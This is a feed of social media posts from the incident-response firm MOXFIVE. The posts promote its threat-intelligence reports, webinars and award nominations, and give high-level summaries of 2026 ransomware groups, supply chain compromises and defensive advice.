Our newest Threat Actor content is live and it's on Qilin, the most active ransomware operation we're tracking in 2026, with over 500 victims. Full TTPs, attack chain, and defense guide: moxfive.com/blog/qilin-ranso… #Qilin #Ransomware #ThreatIntelligence

Honored to share that MOXFIVE has been named one of @Inc's Best Workplaces of 2026. A true reflection of our incredible team. See the full list: inc.com/best-workplaces #IncBestWorkplaces

Voting for the @Zywave Cyber Risk Awards closes Friday May 22. MOXFIVE is a finalist for Cyber IR Team of the Year. If we've worked together, we'd appreciate your support. bit.ly/3OsxBov

MOXFIVE has joined the @AgenticAIFdn. We respond to thousands of real-world incidents and will bring that experience to help shape how agentic AI infrastructure is built for trust. Open standards are how we get there together. bit.ly/4drIZJO #AgenticAI #Cybersecurity

New MOXFIVE Threat Actor Spotlight: NightSpire emerged in early 2025 and has already listed 200 victims, ranking it the 5th most active ransomware operation we track. Full report: bit.ly/nightspire

MOXFIVE Quarterly Ransomware Briefing recap: Qilin leads US victim postings for Q1, The Gentlemen emerging fast, and the TeamPCP supply chain campaign is a case study in how quickly things can escalate. Catch the replay: bit.ly/4eWQdHY

Reminder to register for our MOXFIVE Quarterly Ransomware Briefing TOMORROW 4/29 at 2pm ET! Our team has a packed agenda for this quarter so you don't want to miss out. In addition to threat actor trends from Q1, our team will cover: 🔸 Iranian Cyber Operations & Escalating Threat Landscape 🔸 LiteLLM PyPl Compromise by TeamPCP 🔸 AXIOS npm Supply Chain Attack 🔸 Claude Mythos and Project Glasswing Register Today >> bit.ly/3PZP9sC #cybersecurity #incidentresponse #ir #threatintelligence #threatintel #cyberinsurance #claudemythos #projectglasswing #supplychainattack #axios #teampcp #litellm

The MOXFIVE Monthly Insights for March 2026 is now live! March saw the highest ransomware victim counts of 2026 so far, based on data leak site activity tracked by MOXFIVE. The month also brought active zero-day exploitation targeting network management infrastructure and a growing campaign against software development pipelines. bit.ly/41ElyaL Key Findings: 🔸 Ransomware Activity: RaaS models continued to account for a large share of victim postings in March. Qilin led for the third consecutive month among groups targeting US organizations, with Inc and Akira close behind. DragonForce and Play were also among the most frequently deployed operations in March. The Gentlemen and NightSpire both saw increased activity and warrant monitoring. 🔸 Critical Zero-Day: Interlock ransomware operators exploited a critical vulnerability in Cisco Secure Firewall Management Center as a zero-day beginning January 26, 2026, more than five weeks before Cisco disclosed the patch on March 4. 🔸 Targeting the Software Supply Chain: Threat actors are using social engineering and poisoned package distribution to compromise developer credentials and gain access to source code repositories, CI/CD pipelines, and connected cloud environments. In March, TeamPCP demonstrated how quickly a single compromised tool can cascade into a month-long supply chain campaign spanning npm, PyPI, GitHub Actions, and Docker Hub. Read the full report: bit.ly/41ElyaL #ransomware #cybersecurity #ir #incidentresponse #TeamPCP #Qilin #Akira #DragonForce #Interlock #ThreatIntelligence #ThreatIntel

Q1 2026 didn't hold back. From nation-state APT activity to a sophisticated AI supply chain compromise, the threat landscape has already shifted heading into Q2. Join us for our MOXFIVE Quarterly Ransomware Briefing on Wednesday, April 29th at 2:00 PM ET as the MOXFIVE team breaks down what we're seeing so far in 2026, where the threat landscape might be headed, and considerations for your organization. bit.ly/3PZP9sC Topics we'll cover: 🔸 Q1 Threat Intelligence Trends - What's changed so far this year and where the landscape is heading 🔸  APT & Hacktivist Activity - How nation-state and ideologically motivated actors are exploiting geopolitical tensions 🔸  TeamPCP Supply Chain Attack - How AI tooling is becoming a new and dangerous vector for supply chain risk 🔸 The Gentlemen - A deep dive into this emerging ransomware group's TTPs and real-world impact Register here >> bit.ly/3PZP9sC Wednesday, April 29, 2026 2:00 – 3:00 PM ET #Ransomware #CyberSecurity #ThreatIntelligence #IncidentResponse #MOXFIVE #APT #SupplyChainSecurity #DFIR #InfoSec

Replay now available! Lee Trotter, Michael Brunetti, Kim Detwiler, and Melissa Sachs had a great discussion covering all things BEC, FTF and Data Mining on yesterday's webinar so if you couldn't make it, it's now available whenever you need it! Watch now at >> bit.ly/4cuOzvH #cybersecurity #incidentresponse #BEC #FTF #dfir #eCrime

We're honored to be named a finalist for Cyber Incident Response Team of the Year in the Zywave Cyber Risk Awards again this year! This year we've continued our focus on innovation launching our Agentic Forensics Platform and are excited to share more developments throughout the year. As we've been from day one, we remain dedicated to evolving the industry and delivering effective and efficient outcomes for every client. Voting is open until May 22nd and we'd certainly appreciate your support! Check out all the categories and vote at bit.ly/3OsxBov #CyberRiskAwards2026 #CyberProm #incidentresponse #ir #cybersecurity #cyberinsurance

MOXFIVE just published a Threat Actor Alert on TeamPCP's active software supply chain campaign. LiteLLM versions 1.82.7 and 1.82.8 on PyPI contain a malicious payload, the latest development in a campaign that has been running since March 19, hitting Trivy, GitHub Actions, Docker Hub, npm, and Checkmarx KICS before reaching PyPI. 🔸 March 19: Trivy compromised, 10,000 CI/CD pipelines exposed 🔸 March 20: Stolen npm tokens seeded CanisterWorm across 64 packages 🔸 March 22: Malicious Trivy Docker images pushed directly to Docker Hub 🔸 March 23: Checkmarx KICS GitHub Action tags hijacked 🔸 March 24: LiteLLM 1.82.7 and 1.82.8 published to PyPI with a malicious payload The full report covers the complete campaign timeline and includes resilience recommendations for organizations that may have been exposed. Read the full report: bit.ly/4takNBY Have questions or need help responding? Reach out to our team at incident@moxfive.com or 833-568-6695. #SupplyChainSecurity #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TeamPCP #LiteLLM #Trivy #Checkmarx

Business email compromise is much more than just a phishing problem. BEC and funds transfer fraud remain among the most persistent and costly eCrime threats facing businesses today. The attacks are sophisticated. The financial and legal fallout is real. And most organizations aren't as prepared as they think. That's why we're bringing together experts for a live panel webinar built around one goal: making sure you know exactly what to do when it matters most. Join Lee Trotter, Michael Brunetti, Kim Detwiler and Melissa Sachs on Wednesday, April 8th at 2pm ET and learn more about: 🔸 The current BEC threat landscape — what's evolved and what defenders need to know 🔸 Forensic investigation methodology and key milestones 🔸 Getting maximum value from your privacy counsel partnership 🔸 Post-investigation data mining — efficiencies and pitfalls 🔸 Real-world case studies live Q&A Whether you're in security, legal, compliance, or risk — this is one you don't want to miss. Register Today >> bit.ly/4uIsgcX Questions? Contact us at incident@moxfive.com or 833-568-6695. #cybersecurity #incidentresponse #ir #dfir #BECs #FTF #eCrime

MOXFIVE Monthly Insights are out today! February marked a sharp escalation in the cyber threat environment. The strikes against Iran on February 28 drove an immediate surge in Iranian-aligned cyber activity, with state-sponsored intrusions confirmed on US networks and US companies experiencing destructive attacks resulting in system wipes. bit.ly/3NIhp28 Key Findings: 🔸 Iranian Cyber Threat Landscape: State-sponsored groups including MuddyWater established access on US networks before the conflict escalated, while hacktivist groups launched coordinated DDoS, defacement, and data breach campaigns targeting US, Gulf, and allied organizations. Confirmed destructive attacks against US enterprises show the threat extends well beyond the region. 🔸 Ransomware Remained High: Qilin led for the second consecutive month, with Cl0p continuing its Oracle E-Business Suite exploitation campaign. Play, Akira, and DragonForce were all active across multiple industries, while data extortion groups ShinyHunters and World Leaks continued operations centered on theft and extortion rather than encryption. 🔸 Critical Vulnerabilities: Active exploitation was confirmed across remote access platforms, email infrastructure, and virtualization environments, including flaws in BeyondTrust remote access products, SmarterMail, and VMware ESXi systems linked to ransomware campaigns. 🔸 Most Impacted Industries: Technology and Financial organizations saw the highest impact in February, followed by Healthcare, Manufacturing and Production, and Construction and Engineering. 🔸 Defending Against Disruptive and Destructive Threats: When the threat includes wiper malware and destructive attacks, prevention alone is not enough. Patched edge devices, hardened identities, verified backups, and no default credentials on OT systems are the foundation. Business resilience and operational continuity planning determine how quickly organizations recover when prevention falls short. Read the full February report at bit.ly/3NIhp28 for detailed analysis on Iranian threat actors, active ransomware operations, exploitation trends, and resilience controls. #ransomware #incidentresponse #ir #threatintelligence #threatintel #cybersecurity #Qilin #Akira #Play #DragonForce #Cl0p #Hacktivist #MuddyWater #Handala #OpIsrael #CottonSandstorm #zpentest #CyberAv3ngers #OilRig #APT33 #Agrius

Our latest MOXFIVE Threat Actor Spotlight is out today! Since emerging in August 2025, The Gentlemen ransomware operation has listed more than 200 victims on its data leak site, with January and February alone accounting for more than half of all posted victims. From MOXFIVE's experience, this group is methodical. They come in through compromised credentials or exploited internet-facing services, conduct targeted reconnaissance, and deploy ransomware domain-wide via Group Policy for maximum impact. A few things that set them apart: 🔸 Custom BYOVD defense evasion using ThrottleStop.sys (CVE-2025-7771) to terminate security tooling at the kernel level. 🔸 Variants for Windows, Linux, and ESXi, with encryption observed at both the hypervisor and OS level. 🔸 Data exfiltration before encryption, paired with shadow copy deletion and event log clearing to limit recovery options. 🔸 Domain-wide payload distribution via NETLOGON and SYSVOL. 🔸 Manufacturing and production organizations have been hit hardest, though targeting spans technology, financial services, healthcare, and education across across multiple regions. Read the full report: bit.ly/4bmUwdv If your organization has been impacted or you have questions about The Gentlemen or other threat actors, reach out to our team at incident@moxfive.com or 833-568-6695. #Ransomware #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TheGentlemen #RaaS

We're so honored to be named a finalist for both Cyber Insurance Incident Response Provider and Cyber Security Consulting Services Provider of the Year in the Intelligent Insurer Cyber Insurance Awards! Congratulations to all the finalists! Check out the full list at bit.ly/45Xe1Xe. #CyberInsuranceAwardsUSA #cyberinsurance #incidentresponse #ir #cybersecurity

January showed steady ransomware pressure, with a modest decline from December's volume. Established groups exploited familiar vulnerabilities while social engineering techniques continued to prove effective as initial access vectors. 𝗞𝗲𝘆 𝗙𝗶𝗻𝗱𝗶𝗻𝗴𝘀: 🔸 𝗔𝗰𝘁𝗶𝘃𝗲 𝗧𝗵𝗿𝗲𝗮𝘁𝘀: Qilin led deployment activity, followed by Sinobi and Akira. These RaaS operations maintained consistent pressure across Manufacturing and Production (most impacted), Technology, and Healthcare sectors. 🔸 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 𝗘𝘅𝗽𝗹𝗼𝗶𝘁𝘀: APT28 weaponized a Microsoft Office security feature bypass (CVE-2026-21509) in espionage campaigns. Critical vulnerabilities in Oracle WebLogic and Ivanti Endpoint Manager Mobile both saw exploitation following disclosure, with mass scanning observed after public PoC release. 🔸 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅 𝗦𝗼𝗰𝗶𝗮𝗹 𝗘𝗻𝗴𝗶𝗻𝗲𝗲𝗿𝗶𝗻𝗴: MOXFIVE responded to several cases involving ClickFix—a technique that manipulates users into executing malicious PowerShell commands by impersonating legitimate system prompts. ClickFix succeeds because it exploits user behavior, with variant like CrashFix that deliberately crash browsers before presenting fake recovery instructions. Users see what appears to be a legitimate system prompt and follow instructions that compromise their systems. 🔸 𝗗𝗲𝗳𝗲𝗻𝗱𝗶𝗻𝗴 𝗔𝗴𝗮𝗶𝗻𝘀𝘁 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅: User training remains critical—legitimate sites never ask users to paste commands into Run dialogs or PowerShell consoles. Combine awareness with restricted PowerShell execution, EDR command-line monitoring, and email gateway filtering for HTML attachments. Read the full January report for detailed analysis on ClickFix campaigns, exploitation trends, and defense controls. bit.ly/4rZnvd2 Contact our team at incident@moxfive.com or 833-568-6695. #Cybersecurity #Ransomware #SocialEngineering #ThreatIntelligence #IncidentResponse #Akira #Qilin #Sinobi